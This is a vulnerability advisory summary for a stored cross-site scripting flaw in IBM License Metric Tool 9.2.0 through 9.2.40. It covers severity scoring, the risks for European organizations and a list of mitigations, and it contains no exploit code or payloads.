CVE-2025-36352 is a stored cross-site scripting (XSS) vulnerability affecting IBM License Metric Tool versions 9.2.0 through 9.2.40. This vulnerability arises due to improper neutralization of input during web page generation (CWE-79), allowing an authenticated user to inject arbitrary JavaScript code into the web user interface. Because the malicious script is stored persistently, it can execute whenever a legitimate user accesses the affected page, potentially altering intended functionality. The exploitation does not require user interaction beyond authentication, and the attacker can leverage the trusted session to disclose sensitive information such as user credentials. The CVSS v3.1 base score is 6.4 (medium severity), reflecting network attack vector, low attack complexity, required privileges (authenticated user), no user interaction, and a scope change. The vulnerability impacts confidentiality and integrity but not availability. No known exploits are reported in the wild yet, and no patches have been linked at the time of publication. The IBM License Metric Tool is used for software license management and compliance tracking, making it a critical asset in enterprise environments. The vulnerability's exploitation could lead to unauthorized access escalation or data leakage within organizations relying on this tool for license governance.

For European organizations, this vulnerability poses a significant risk to the confidentiality and integrity of license management data and potentially broader enterprise systems if credentials are compromised. Since the IBM License Metric Tool is often integrated into IT asset management and compliance workflows, exploitation could disrupt license compliance reporting, leading to regulatory and financial repercussions. The ability to inject persistent scripts could enable attackers to harvest session tokens or credentials, facilitating lateral movement or privilege escalation within the network. Given the trusted nature of the application, users may be more susceptible to executing malicious scripts unknowingly. This risk is heightened in sectors with strict compliance requirements such as finance, healthcare, and government institutions prevalent across Europe. Additionally, the vulnerability requires authentication, so insider threats or compromised accounts could be leveraged to exploit it, emphasizing the need for strong identity and access management controls.

1. Immediate mitigation should include restricting access to the IBM License Metric Tool to only trusted and necessary personnel, enforcing strong authentication mechanisms such as multi-factor authentication (MFA) to reduce the risk of account compromise. 2. Implement strict input validation and output encoding on all user-supplied data fields within the web UI to prevent injection of malicious scripts. 3. Monitor and audit user activities and logs for unusual behavior indicative of exploitation attempts. 4. Network segmentation should be employed to isolate the License Metric Tool from critical systems to limit lateral movement in case of compromise. 5. Since no official patches are linked yet, organizations should engage with IBM support for any available hotfixes or workarounds and apply them promptly once released. 6. Educate users about the risks of XSS and encourage cautious behavior when interacting with the tool’s web interface. 7. Employ web application firewalls (WAFs) with rules tailored to detect and block XSS payloads targeting this application. 8. Regularly review and update the tool to the latest versions once patches addressing this vulnerability are available.